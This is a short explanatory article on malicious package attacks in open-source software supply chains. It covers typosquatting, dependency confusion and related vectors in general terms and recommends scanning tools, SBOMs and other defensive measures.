Uncovering the Tactics and Impact of Malicious Package Attacks on Software Supply Chains

The Growing Threat of Malicious Package Attacks: Tactics and Impact on Cybersecurity

Introduction

Malicious package attacks are not a new threat; however, their proliferation is on the rise. In a recent report, Mend identified a 315% increase in malicious packages published to popular open source libraries from 2021 to 2022, and it expects this trend to continue. Malicious packages are a type of malware that uses similar techniques to trick people into downloading them, wreaking havoc on users’ systems. As these packages often come from seemingly trustworthy sources, they are particularly effective.

The Anatomy of a Malicious Package Attack

The attackers exploit four basic attack vectors for malicious packages: brandjacking, typosquatting, dependency hijacking, and dependency confusion. To advance these attacks, attackers rely on simple techniques such as re- and post-install scripts, basic evasion techniques, shell commands, and basic network communication techniques. Recently, attackers have begun to adopt more advanced techniques, such as telemetry, to enable data collection.

Attack Vectors:

• Brandjacking: This involves the attacker acquiring or usurping the online identity of another company or owner of a package and then inserting malicious code into the package.
• Typosquatting: This attack relies on a simple typo, where the attacker publishes a malicious package with a name similar to a popular package and waits for a developer to misspell the package name and unintentionally call the malicious version.
• Dependency hijacking: An attacker obtains control of a repository to upload a new malicious version of a package.
• Dependency confusion: In this attack, a malicious package in public repositories has the same name as an internal package name, tricking dependency management tools into downloading the public malicious package.

Attack Techniques:

• Re- and Post-Install Scripts: Attackers embed scripts into packaged codes that execute commands during or after installation.
• Basic Evasion Techniques: Attackers may opt for tactics such as obfuscation to evade detection.
• Shell Commands: Shell commands allow access to the environment through the package the attacker has inserted into the code.
• Basic Network Communication Techniques: Attackers deploy payloads to communicate and execute in the environment.

The Impact of Malicious Packages on Cybersecurity

Malicious package attacks offer a very high return for attackers in terms of the effort expended. As malicious packages are publicly accessible, anyone with basic programming skills can easily create and publish them to open-source repositories. The threat of malicious package attacks puts a renewed urgency on the need for organizations to prioritize the security of their software supply chain. Companies must utilize automated scanning tools to monitor open source code repositories and libraries for vulnerabilities and attacks and take advantage of tools that help generate a software bill of materials (SBOM).

Preventive Measures:

• Use automated scanning to monitor open source code repositories and libraries for vulnerabilities and attacks.
• Use tools to help generate a software bill of materials (SBOM).
• Use a secure software supply chain and prioritize application security programs.
• Consider fundamental network segmentation with security policies governing the movement of data.
• Encourage users to embrace multifactor authentication techniques.

Conclusion

Malicious package attacks pose a serious threat to organizational cybersecurity. These attacks are less sophisticated but highly effective, primarily because open source packages are publicly accessible. As attacks become more sophisticated, organizations must increase their efforts to secure their software supply chain. Implementing scanning tools and generating an SBOM may help make their systems more secure. The impact of malicious package attacks underlines the importance of prioritizing the security of the software supply chain to counter cybersecurity threats.